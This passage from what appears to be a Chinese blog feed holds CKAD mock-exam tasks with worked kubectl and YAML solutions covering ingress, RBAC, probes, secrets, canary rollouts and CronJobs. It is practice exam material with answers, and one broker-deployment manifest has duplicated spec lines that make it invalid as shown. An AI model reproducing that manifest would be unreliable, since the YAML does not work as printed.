      imagePullPolicy: IfNotPresent #使用已有镜像,加快pod运行
      ports:
        - containerPort: 80
          name: "http-server"
      volumeMounts:
        - mountPath: "/usr/share/nginx/html" #挂载地址
          name: task-pv-storage

创建pod

kubectl apply -f pod-pv.yaml

检查

kubectl get pod -owide | grep task-pv-pod
curl 10.244.140.65

pv-pvc-0

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 22. Deployment 修改镜像 /archives/kubernetes/CKAD/edit-image.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 namespace default 中的一个 Deployment 由于指定了错误的容器镜像而失败。找出此 Deployment 并修复问题

参考

kubectl --help

解答

切换环境

kubectl config use-context k8s

检查

kubectl -n default get all

edit-image-0

发现 deploy-nk8s 出现了错误,检查日志

kubectl -n default logs deploy-nk8s-58b86cdc9c-9vzp9
kubectl -n default describe pod deploy-nk8s-58b86cdc9c-9vzp9

edit-image-1
edit-image-2

修正两方法, edit或者set 通过pod名知道隶属于deployment, 所以直接编辑deployment deploy-nk8s即可

kubectl -n default describe deployments.apps deploy-nk8s

edit-image-3

kubectl -n default edit deployments.apps deploy-nk8s

edit-image-4

使用set命令直接修改

kubectl -n default set image deployment/deploy-nk8s nginx=nginx
#kubectl -n namespace set image deployment/部署名 容器name=容器地址

edit-image-5

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 21. Service , Configmap , Sidecar /archives/kubernetes/CKAD/svc-configmap-sidecar.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

更新在 namespace default 中的 Service nginxsvc 来暴露端口 9090 。
在 namespace default 中创建一个名为 haproxy-config 并存储着的/ckad/ambassador/haproxy.cfg 的内容的 ConfigMap。
更新在 namespace default 中名为 poller 的 Pod：
- 首先，添加一个使用 haproxy:lts 镜像、暴露端口 80 并名为 ambassador-container 的 ambassador 容器（大使代理模式）。
- 最后，ConfigMap haproxy-config 要挂载到 ambassador 容器 ambassador-container 的 /usr/local/etc/haproxy/ 目录。

参考

https://kubernetes.io/zh-cn/docs/concepts/configuration/configmap/

挂载的例子

apiVersion: v1
kind: Pod
metadata:
  name: mypod
spec:
  containers:
  - name: mypod
    image: redis
    volumeMounts:
    - name: foo
      mountPath: "/etc/foo"
      readOnly: true
  volumes:
  - name: foo
    configMap:
      name: myconfigmap

解答

切换环境

kubectl config use-context k8s

1. 修改svc端口

kubectl -n default get svc
kubectl -n default edit svc nginxsvc
kubectl -n default get svc nginxsvc -owide

apiVersion: v1
kind: Service
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","kind":"Service","metadata":{"annotations":{},"name":"nginxsvc","namespace":"default"},"spec":{"ports":[{"port":80,"protocol":"TCP","targetPort":80}],"selector":{"app":"nginxsvc"}}}
  creationTimestamp: "2023-05-24T13:45:01Z"
  name: nginxsvc
  namespace: default
  resourceVersion: "17051"
  uid: cd4c38bd-e282-414f-a4cb-9fe3a5ccd0c5
spec:
  clusterIP: 10.111.178.212
  clusterIPs:
  - 10.111.178.212
  internalTrafficPolicy: Cluster
  ipFamilies:
  - IPv4
  ipFamilyPolicy: SingleStack
  ports:
  - port: 9090 #修改这里为题目要求
    protocol: TCP
    targetPort: 80
  selector:
    app: nginxsvc
  sessionAffinity: None
  type: ClusterIP
status:
  loadBalancer: {}

svc-configmap-sidecar-0

2. 使用文件创建configmap

kubectl -n default create configmap haproxy-config --from-file /ckad/ambassador/haproxy.cfg

3. 更新pod

kubectl -n default get pod poller -oyaml > poller.yaml
cp poller.yaml !$.bak 或者 cp poller.yaml $_.bak
kubectl delete -f poller.yaml
vim poller.yaml

添加或者修改边车容器和 configMap挂载, 格式可以从上面拷贝, port可以在文件中其他行拷贝,考试时如果存在则需要检查是否正确进行修改,重复添加会报错

svc-configmap-sidecar-1

应用yaml文件并检查

#应用之前
kubectl -n default get svc -owide
curl 10.111.178.212:9090
#应用之后
kubectl apply -f poller.yaml
curl 10.111.178.212:9090

svc-configmap-sidecar-2

能访问到poller的原因是 svc里面有poller对应的标签

kubectl -n default get pod --show-labels 
kubectl -n default get svc -oyaml | grep -i selector -A3

svc-configmap-sidecar-3

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 20. Ingress排错 - 2 /archives/kubernetes/CKAD/ingress-2.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在namespace ingress-kk 下有一个 ingress ，但是它貌似不能被正常访问请排除出原因，并修复。

请注意，这道题的deployment 是正确的，请不要修改 deployment 。

参考

https://kubernetes.io/zh-cn/docs/concepts/services-networking/service/

ingress-2-0

解答

切换环境

kubectl config use-context k8s

检查

kubectl -n ingress-kk get all

ingress-2-1

发现没有svc, svc所需要的东西来自deployment和ingress,

deployment中找标签,targetport,

kubectl -n ingress-kk get deployments.apps nginxdep -oyaml

ingress-2-2

ingress中找svc所需的svc名和port

ingress-2-3

创建svc,使用命令吧

#查看svc,ingress
kubectl -n ingress-kk get svc,ingress -owide
kubectl -n ingress-kk expose deployment nginxdep --name nginxsvc-kk --port 80 --target-port 80 --selector name=nginx-lab
curl 10.102.130.182

没有svc之前

ingress-2-4

创建svc后

ingress-2-5

也可以使用yaml文件进行创建

cat <<"EOF" | kubectl apply -f -
---
apiVersion: v1
kind: Service
metadata:
  name: nginxsvc-kk
  namespace: ingress-kk
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    name: nginx-lab
EOF

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 19. Ingress排错 - 1 /archives/kubernetes/CKAD/ingress-1.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 namespace ingress-ckad 下，有 deployment service ingress 三个资源已经部署好了, 但是他们的配置有问题，导致的ingress 网络不通。 3个资源的配置清单在目录 /ckad/CKAD202206 中，请将其修改为正确的，并重新创建。

请注意，这道题的deployment 是正确的，请不要修改 deployment

参考

https://kubernetes.io/zh-cn/docs/concepts/services-networking/ingress/

解答

切换环境

kubectl config use-context k8s

查看已有的svc并访问

kubectl -n ingress-ckad get pod,svc,ingress -owide
curl 10.106.76.153

ingress-1-0

查看配置并进行修改

vim /ckad/CKAD202206/ingress.yaml

ingress.yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-dm
  namespace: ingress-ckad
spec:
  replicas: 2
  selector:
    matchLabels:
      name: nginx-ing
  template:
    metadata:
      labels:
        name: nginx-ing #标签
    spec:
      containers:
      - name: nginx
        image: vicuu/nginx:hello81
        imagePullPolicy: IfNotPresent
        ports:
          - containerPort: 81 #容器端口
---
apiVersion: v1
kind: Service
metadata:
  name: nginx-ing-svc #服务名
  namespace: ingress-ckad
spec:
  ports:
  - port: 80 #和ingress的端口一致
    targetPort: 81 #这个端口需要和deployment的containerPort值一致
    protocol: TCP
  selector:
    name: nginx-ing #修改标签 和deployment的一致

---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: nginx-ingress-test
  namespace: ingress-ckad
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /
spec:
  ingressClassName: nginx-example123
  rules:
  - http:
      paths:
      - path: /hello
        pathType: Prefix
        backend:
          service:
            name: nginx-ing-svc #需要和service的服务名一致
            port:
              number: 80 # 需要和service的port的值一致

应用

kubectl apply -f /ckad/CKAD202206/ingress.yaml

查看并测试

kubectl apply -f /ckad/CKAD202206/ingress.yaml
curl 10.106.76.153
curl 10.102.130.182/hello

ingress-1-1

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 18. NetworkPolicy 网络策略 /archives/kubernetes/CKAD/NetworkPolicy.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

更新在namespace ckad00018 中的 Pod ckad00018-newpod 使其使用一个只允许此 Pod 与 Pod front 和 db 之间收发流量的 Networkpolicy 。

参考

https://kubernetes.io/zh-cn/docs/concepts/services-networking/network-policies/

NetworkPolicy-0

解答

切换环境

kubectl config use-context k8s

查看pod 和networkpolicy

kubectl -n ckad00018 get pod --show-labels
kubectl -n ckad00018 get networkpolicies --show-labels

NetworkPolicy-1

查看networkpolicy 的 podselector

kubectl -n ckad00018 get networkpolicies access-db -oyaml | grep -i -A3 podselector
kubectl -n ckad00018 get networkpolicies access-front -oyaml | grep -i -A3 podselector

NetworkPolicy-2

通过查看所有networkpolicy 得知， front和 db 各有一个 networkpolicy ckad00018-newpod 没networkpolicy 所以查看front 和 db 的 networkpolicy 标签把可以跟他们互通的标签，设置给 ckad00018-newpod

kubectl -n ckad00018 label pod  ckad00018-newpod front-access=true db-access=true
kubectl -n ckad00018 get pod --show-labels

NetworkPolicy-3

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 17. 更新 Deployment 并暴露 Service /archives/kubernetes/CKAD/Service.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

首先更新在 namespace ckad00017 中的 Deployment ckad00017-deployment :
- 以使其运行 5 个 Pod 的副本
- 将以下标签添加到 Pod tier: dmz
然后在 namespace ckad00017 中创建一个名为 rover 的 NodePort Service 以在 TCP 端口 81 上公开 Deployment ckad00017-deployment

参考

kubectl -h
kubectl expose -h

解答

切换环境

kubectl config use-context k8s

任务1: 可以使用edit编辑或者导出配置文件删除deployment编辑后重建

kubectl -n ckad00017 edit deployments.apps ckad00017-deployment

如果出错使用编辑配置文件的方式进行

kubectl -n ckad00017 get deployments.apps -oyaml > 17.yaml
kubectl delete -f 17.yaml
vim 17.yaml

kubectl apply -f 17.yaml

Service-0

查看副本数量和标签

kubectl -n ckad00017 get pod --show-labels

任务2:

#查看端口
kubectl -n ckad00017 get deployments.apps ckad00017-deployment -oyaml| grep -i port -A3
#expose 暴露端口, port为service的端口, target-port为容器端口, 默认为80,以检查为准
kubectl -n ckad00017 expose deployment ckad00017-deployment --name rover --protocol TCP --port 81 --target-port 81 --type NodePort
#查看
kubectl -n ckad00017 get svc

Service-1

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 16. Deployment 使用 ServiceAcount /archives/kubernetes/CKAD/ServiceAccount.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

更新在 namespace frontend 中的 Deployment 使其使用现有的 ServiceAccount app

参考

kubectl --help

解答

切换环境

kubectl config use-context k8s

方法1: 直接通过命令设置

kubectl -n frontend get deployments.apps
kubectl -n frontend set serviceaccount deployments frontend-deployment app
kubectl -n frontend describe deployments.apps frontend-deployment

ServiceAccount-0

方法2: 编辑现有deployment

kubectl -n frontend edit deployments.apps frontend-deployment

spec.template.spec下添加

serviceAccount: app
serviceAccountName: app

ServiceAccount-1

]]> kubernetes CKAD K8s Killer.sh CKAD KAD 模拟题库 | 15. 升级与回滚 /archives/kubernetes/CKAD/rollout.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

更新 namespace ckad00015 中的 Deployment webapp 的比例缩放配置将 maxSurge 设置为 10% ，将 maxUnavailable 设置为 4
更新 Deployment webapp 以让容器镜像 lfccncf/nginx 使用版本标签 1.13.7
将 Deployment webapp 回滚至 前一版本

参考

https://kubernetes.io/zh-cn/docs/concepts/workloads/controllers/deployment/

解答

切换环境

kubectl config use-context k8s

修改deployment 滚动升级策略

kubectl -n ckad00015 edit deployments.apps webapp

rollout-0

修改image版本

#查看当前镜像名和版本
kubectl -n ckad00015 get deployments.apps webapp -oyaml | grep image -A3 -B3

#修改镜像版本,加record方便后面查看
kubectl -n ckad00015 set image deployment webapp nginx=lfccncf/nginx:1.13.7 --record

rollout-1

查看历史

kubectl -n ckad00015 rollout history deployment webapp

回滚

kubectl -n ckad00015 rollout undo deployment webapp
#或者指定版本
kubectl -n ckad00015 rollout undo deployment webapp --to-revision 1

检查回滚后的镜像版本

kubectl -n ckad00015 get deployments.apps webapp -oyaml | grep image

rollout-2

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 14. Pod 健康检查 readinessProbe /archives/kubernetes/CKAD/readinessProbe.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

修改现有的 deployment probe-http 增加 readinessProbe 探测器，规格如下：

使用 httpGet 进行探测
探测路径为 /healthz/return200
探测端口为 80
在执行第一次探测前应该等待 15 秒

参考

https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/

readinessProbe-0

解答

切换环境

kubectl config use-context k8s

编辑 deployment probe-http 添加httpget就绪检测

readinessProbe:
  httpGet:
    path: /healthz/return200
    port: 80
    scheme: HTTP
  initialDelaySeconds: 15
  periodSeconds: 20

readinessProbe-1

查看pod

kubectl get pod

真实考试时的 yaml 文件内容如下：

readinessProbe-2

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 13. Pod 健康检查 livenessProbe /archives/kubernetes/CKAD/livenessProbe.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

由于Liveness Probe 发生了问题您无法访问一个应用程序。该应用程序可能在任何 namespace 中运行

找出对应的 Pod 并将其名称和 namespace 写入文件 /ckad/CKAD00011/broken.txt 使用以下格式
/
文件 /ckad/CKAD00011/broken.txt 已存在
用 kubectl get events 来获取相关错误事件井将其写入文件 /ckad/CKAD00011/error.txt 请使用输出格式 wide 文件 /ckad/CKAD00011/error.txt 已存在。
修复故障的 Pod 的 Liveness Probe 问题。

参考

https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/

解答

切换环境

kubectl config use-context k8s

检查集群下所有命名空间中的pod, 找出liveness probe问题的pod

kubectl get pods -A

对所有namespace下的pod逐一检查，考试时，切换集群后,只会有5个pod需要你检查,不会像模拟环境里这么多

kubectl describe pod probe-demo -n probe-ns | tail

livenessProbe-0

写日志到文件

echo probe-ns/probe-demo > /ckad/CKAD00011/broken.txt

kubectl -n probe-ns get events -o wide | grep probe-demo > /ckad/CKAD00011/error.txt

修复

kubectl -n probe-ns get pod probe-demo -o yaml > probe.yaml
cp probe.yaml probe.yaml-bak
kubectl delete -f probe.yaml
vim probe.yaml

修改port 为命令中对应的端口8443

livenessProbe-1

kubectl apply -f probe.yaml

检查

kubectl -n probe-ns describe pod probe-demo | tail

livenessProbe-2

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 12. Secret /archives/kubernetes/CKAD/Secret.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 namespace default 中创建一个名为 another-secret 并包含以下单个键值对的 Secret key1:value2
在 namespace default 中创建一个名为 nginx-secret 的 Pod 。用 nginx:1.16 的镜像来指定一个容器。添加一个名为 COOL_VARIABLE 的环境变量来使用 secret 键 key1 的值。

参考

https://kubernetes.io/zh-cn/docs/concepts/configuration/secret/

https://kubernetes.io/zh-cn/docs/tasks/inject-data-application/distribute-credentials-secure/#define-container-env-var-using-secret-data

Secret-0

解答

切换环境

kubectl config use-context k8s

创建secret

kubectl create secret generic another-secret --from-literal key1=value2

创建pod,并使用secret,

vim nginx-secret.yaml

apiVersion: v1
kind: Pod
metadata:
  name: nginx-secret
spec:
  containers:
  - name: nginx-secret
    image: nginx:1.16
    env:
    - name: COOL_VARIABLE
      valueFrom:
        secretKeyRef:
          name: another-secret
          key: key1

kubectl apply -f nginx-secret.yaml

检查

kubectl exec -it nginx-secret -- env | grep COOL

Secret-1

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 11. ConfigMap /archives/kubernetes/CKAD/ConfigMap.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 namespace default 中创建一个名为 some-config 并存储着以下键值对的 Configmap: key3:value4
在 namespace default 中创建一个名为 nginx-configmap 的 Pod 。用 nginx:stable 的镜像来指定一个容器。用存储在Configmap some-config 中的数据来填充卷并将其安装在路径 /some/path

参考

https://kubernetes.io/zh-cn/docs/concepts/configuration/configmap/

ConfigMap-0

解答

切换环境

kubectl config use-context k8s

创建configmap

kubectl create configmap some-config --from-literal key3=value4
kubectl describe configmaps some-config

ConfigMap-1

创建pod,并使用configmap 挂载到/some/path

vim nginx-configmap.yaml

---
apiVersion: v1
kind: Pod
metadata:
  name: nginx-configmap
spec:
  containers:
  - name: nginx-configmap
    image: nginx:stable
    volumeMounts:
    - name: config
      mountPath: "/some/path"
  volumes:
  - name: config
    configMap:
      name: some-config

kubectl apply -f nginx-configmap.yaml

检查configmap是否挂载到了目录

kubectl exec -it nginx-configmap -- cat /some/path/key3

ConfigMap-2

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 10. RBAC 授权 /archives/kubernetes/CKAD/RBAC.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在名为 honeybee-deployment 的 Deployment 和 namespace gorilla 中的一个 Pod 正在记录错误

查看日志以识别错误消息找出错误,包括 User "system:serviceaccount:gorilla:default "can not list resource "serviceaccounts "[…] in the namespace "gorilla"
更新 Deployment honeybee-deployment 以解决 Pod 日志中的错误。您可以在 /ckad/prompt-escargot/honeybee-deployment.yaml 中找到 honeybee-deployment 的清单文件

参考

https://kubernetes.io/zh-cn/docs/reference/access-authn-authz/rbac/

解答

切换环境

kubectl config use-context k8s

查看错误日志

kubectl -n gorilla get pod
kubectl -n gorilla logs honeybee-deployment-bdfd994c-chbbl

RBAC-0

考试时，无论是不能 list pods ，还是不能 list deployments ，或者不能 list serviceaccounts ，做法都一样。

查看deployment 的sa

kubectl -n gorilla describe deployments.apps honeybee-deployment

RBAC-1

查看gorilla下的role,rolebinding,sa 详细信息

kubectl -n gorilla describe role,rolebinding,sa

RBAC-2

可以看到, gorilla-role 具有 get list 权限, 对应的sa为 gorilla-sa ,所以修改sa为 gorilla-sa

kubectl -n gorilla set serviceaccount deployments honeybee-deployment gorilla-sa

查看deployment 是否修改了sa

kubectl -n gorilla describe deployments.apps honeybee-deployment

RBAC-3

检查并查看pod日志

kubectl -n gorilla get pod
kubectl -n gorilla logs honeybee-deployment-d8b9685f9-bhh6s

RBAC-4

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 9. 创建 Deployment 并指定环境变量 /archives/kubernetes/CKAD/deployment-env.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在现有的 namespace ckad00014 中创建一个运行 6 个 Pod 副本 ,名为 api 的 Deployment 。用 nginx:1.16 的镜像来指定一个容器。将名为 NGINX_PORT 且值为 8000 的环境变量添加到容器中然后公开端口 80

参考

https://kubernetes.io/zh-cn/docs/tasks/inject-data-application/define-environment-variable-container/

deployment-env-0

解答

切换环境

kubectl config use-context k8s

创建一个yaml模板,然后进行修改

kubectl create deployment api --image nginx:1.16 --replicas 6 -n ckad00014 --dry-run=client -oyaml > api.yaml
vim api.yaml

deployment-env-1

添加如下

env:
- name: NGINX_PORT
  value: "8000"
port:
- containerPort: 80

deployment-env-2

应用

kubectl apply -f api.yaml

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 8. 配置container 安全上下文 /archives/kubernetes/CKAD/securityContext.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

修改运行在 namespace quetzal 名为 broker-deployment 的现有 Deployment 使其容器

以用户 30000 运行
禁止特权提升。

您可以在 /ckad/daring-moccasin/broker-deployment.yaml 找到 broker-deployment 的清单文件

参考

https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/security-context/

kubectl explain deployment.spec.template.spec.containers.securityContext

securityContext-0
securityContext-1

解答

切换环境

kubectl config use-context k8s

查看并编辑对应的deployment

kubectl -n quetzal get deployments.apps
kubectl -n quetzal edit deployments.apps broker-deployment

在 spec.template.spec.containers 下添加 securityContext

apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
    kubectl.kubernetes.io/last-applied-configuration: |
  creationTimestamp: "2023-05-24T13:00:32Z"
  generation: 1
  name: broker-deployment
  namespace: quetzal
  resourceVersion: "19019"
  uid: 43b31f70-9362-443a-a944-52b688bd1f46
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app: broker-deployment
  strategy:
    rollingUpdate:
      maxSurge: 25%
      maxUnavailable: 25%
    type: RollingUpdate
  template:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app: broker-deployment
  strategy:
    rollingUpdate:
      maxSurge: 25%
      maxUnavailable: 25%
    type: RollingUpdate
  template:
    metadata:
      creationTimestamp: null
      labels:
        app: broker-deployment
    spec:
      containers:
      - command:
        - sh
        - -c
        - sleep 5h
        image: busybox
        imagePullPolicy: IfNotPresent
        name: sec-ctx-demo
        resources: {}
        securityContext:      # 添加
          allowPrivilegeEscalation: false  # 添加
          runAsUser: 30000    # 添加
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
        volumeMounts:
        - mountPath: /data/demo
          name: sec-ctx-vol
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}

securityContext-2

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 7. 金丝雀部署 /archives/kubernetes/CKAD/canary.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

namespace goshawk 中名为 chipmunk-service 的 Service 指向名为 current-chipmunk-deployment 的 Deployment 创建的 5 个 Pod
canary-0

你可以在 /ckad/goshawk中找到 current-chipmunk-deployment 的清单文件。

在同一 namespace 中创建一个相同的 Deployment 名为 canary-chipmunk-deployment
修改 Deployment 以便
- 在 namespace goshawk 中运行的 Pod 的最大数量为 10 个
- chipmunk.service 流量的 40%流向 Pod canary-chipmunk-deployment

参考

https://kubernetes.io/zh-cn/docs/concepts/cluster-administration/manage-deployment/#canary-deployments
https://kubernetes.io/zh-cn/docs/concepts/workloads/controllers/deployment/#canary-deployment

kubectl -h
kubectl scale -h

解答

切换环境

kubectl config use-context k8s

copy一份yaml文件,并进行编辑, 修改为canary-chipmunk-deployment部署的yaml

cd /ckad/goshawk/
cp current-chipmunk-deployment.yaml canary-chipmunk-deployment.yaml
vim canary-chipmunk-deployment.yaml

canary-chipmunk-deployment.yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: canary-chipmunk-deployment #修改为题目要求
  namespace: goshawk #修改为题目要求
spec:
  replicas: 1
  selector:
    matchLabels:
      app: canary-chipmunk-deployment #修改为题目要求
      run: dep-svc #确保和current-chipmunk-deployment都有此标签
  template:
    metadata:
      labels:
        app: canary-chipmunk-deployment #修改为题目要求
        run: dep-svc #确保和current-chipmunk-deployment都有此标签
    spec:
      containers:
      - image: vicuu/nginx:hi
        name: nginx

创建canary pod

kubectl apply -f canary-chipmunk-deployment.yaml

根据题目, 10个pod ,current 60%,canary 40%, 如果是其他比例也要灵活, 比如8:2等

kubectl -n goshawk scale deployment current-chipmunk-deployment --replicas 6
kubectl -n goshawk scale deployment canary-chipmunk-deployment --replicas 4

查看pod

kubectl -n goshawk get pod

canary-2

测试

kubectl -n goshawk get svc -owide
for i in {1..1000} ; do  curl -qs 10.109.141.220;done | sort |uniq -c

进行1000此请求计算百分比, 流量6:4

canary-3

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 6. 运行旧版应用程序 /archives/kubernetes/CKAD/spec-selector.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

修复清单文件 /ckad/credible-mite/www.yaml 中的任何 API 弃用问题以便可以将应用程序部署在 k8s cluster 上。注意：该应用程序是为 Kubernetes v1.15 开发的。 k8s cluster 运行着 Kubernetes v1.26
请在 garfish namespace 中部署更新后的清单文件 /ckad/credible-mite/www.yaml 中指定的应用程序。

参考

kubectl explain deployment.spec
kubectl explain deployment.spec.selector

1.8版本之前 .spec.selector 可以省略 1.8版本之后 .spec.selector 不可以省略

解答

切换环境

kubectl config use-context k8s

编辑yaml文件

vim /ckad/credible-mite/www.yaml

#/ckad/credible-mite/www.yaml
apiVersion: apps/v1 #修改
kind: Deployment
metadata:
  name: www-deployment
  namespace: garfish #namespace
spec:
  replicas: 1
  selector:         #添加
    matchLabels:    #添加
      app: nginx    #添加
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.16
        ports:
          - containerPort: 80
        volumeMounts:
          - mountPath: /var/log/nginx
            name: logs
        env:
          - name: NGINX_ENTRYPOINT_OUIET_LOGS
            value: "1"
      volumes:
        - name: logs
          emptyDir: {}

创建pod

kubectl apply -f /ckad/credible-mite/www.yaml

检查

kubectl -n garfish get all

spec-selector-0

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 5. CPU和内存限制 /archives/kubernetes/CKAD/limits.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

namespace haddock 中名为 nosql 的 Deployment 的 Pod 因其容器已用完资源而无法启动。请更新 haddock Deployment ，使 Pod

为其容器请求 15Mi 的内存
将内存限制为 haddock namespace 设置的最大内存容量的 一半 。您可以在 /ckad/chief-cardinal/nosql.yaml 找到 nosql Deployment 的配置清单。

参考

https://kubernetes.io/zh-cn/docs/concepts/configuration/manage-resources-containers/

limits-0

解答

切换环境

kubectl config use-context k8s

查看namespace最大资源请求

kubectl describe ns haddock
#或者
kubectl -n haddock describe limitranges

注意查看Max的值

limits-1

修改deployment

方法1

直接编辑deployment

kubectl -n haddock edit deployments.apps nosql

在大约40行左右添加资源限制

resources:
  limits:
    memory: 20Mi
  requests:
    memory: 15Mi

limits-2

检查

kubectl -n haddock describe deployments.apps nosql

limits-3

方法2

删除重建

kubectl delete -f /ckad/chief-cardinal/nosql.yaml

编辑文件,添加资源请求

vim /ckad/chief-cardinal/nosql.yaml

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nosql
  namespace: haddock
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nosql
  template:
    metadata:
      labels:
        app: nosql
    spec:
      containers:
      - image: nginx:1.16
        name: nginx
        #添加下面的资源请求
        resources:
          requests:
            memory: "15Mi"
          limits:
            memory: "20Mi"

创建&检查

kubectl apply -f /ckad/chief-cardinal/nosql.yaml
kubectl -n haddock describe deployments.apps nosql

limits-4

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 4. CPU和内存请求 /archives/kubernetes/CKAD/resources.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在现有的 namespace pod-resources 中创建一个名为 nginx-resources 的 Pod 。镜像为 nginx:1.16 ,为其容器指定资源请求 40m 的 CPU 和 50Mi 的内存

参考

https://kubernetes.io/zh-cn/docs/concepts/configuration/manage-resources-containers/

resources-0

解答

切换环境

kubectl config use-context k8s

编辑yamlwenj

vim nginx-resources.yaml

apiVersion: v1
kind: Pod
metadata:
  name: nginx-resources
  namespace: pod-resources
spec:
  containers:
  - name: nginx-resources
    image: nginx:1.16
    resources:
      requests:
        memory: "50Mi"
        cpu: "40m"

创建pod

kubectl apply -f nginx-resources.yaml

检查

kubectl -n pod-resources get pod
kubectl -n pod-resources describe pod nginx-resources

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 3. Dockerfile /archives/kubernetes/CKAD/Dockerfile.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

一个Dockerfile 已经存在于 /ckad/DF/Dockerfile

使用已存在的 Dockerfile ，构建一个名为 centos 和标签为 8.2 的容器镜像。您可以安装和使用您选择的工具。
使用您选择的工具，以 OCI 格式导出构建的容器镜像，并将其存储在 /ckad/DF/centos-8.2.tar

参考

docker -h

解答

切换环境

kubectl config use-context k8s

查看dockerfile /ckad/DF/Dockerfile

FROM centos:8
LABEL maintainer="test dockerfile"
LABEL test=dockerfile
USER root
RUN useradd shadow
RUN mkdir /opt/shadow

构建镜像

cd /ckad/DF/
sudo docker build -t centos:8.2 .

检查镜像

sudo docker images

导出镜像并保存

sudo docker save centos:8.2 > /ckad/DF/centos-8.2.tar
ll

Dockerfile-0

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 2. CronJob-2 /archives/kubernetes/CKAD/CronJob-2.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在清单文件 /ckad/CKAD00016/periodic.yaml 中定义此 Pod
在一个 busybox:stable 容器中运行命令 date 该命令必须每分钟运行一次，并且必须在 10 秒内完成运行，或者被 Kubernetes 终止运行。
注意： CronJob 名称和容器名称都必须为 hello
在上述清单文件中创建此资源，并验证此 Job 至少成功执行一次。

参考

https://kubernetes.io/zh-cn/docs/tasks/job/automated-tasks-with-cron-jobs/https://kubernetes.io/zh-cn/docs/concepts/workloads/controllers/job/

kubectl explain cronjob.spec

CronJob-2-0

解答

编辑yaml文件

vim /ckad/CKAD00016/periodic.yaml

apiVersion: batch/v1
kind: CronJob
metadata:
  name: hello           # 名称
spec:
  schedule: "* * * * *" #根据实际情况修改
  jobTemplate:
    spec:
      activeDeadlineSeconds: 10 #pod存活时间
      template:
        spec:
          containers:
          - name: hello         #名称
            image: busybox:stable #镜像
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - date              #命令
          restartPolicy: OnFailure

创建 cronjob

kubectl apply -f /ckad/CKAD00016/periodic.yaml

检查cronjob和job, job需要一分钟以后才能看到

kubectl get cronjobs hello
kubectl get jobs

CronJob-2-1

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 1. CronJob-1 /archives/kubernetes/CKAD/CronJob-1.html 模拟题目:

设置配置环境：

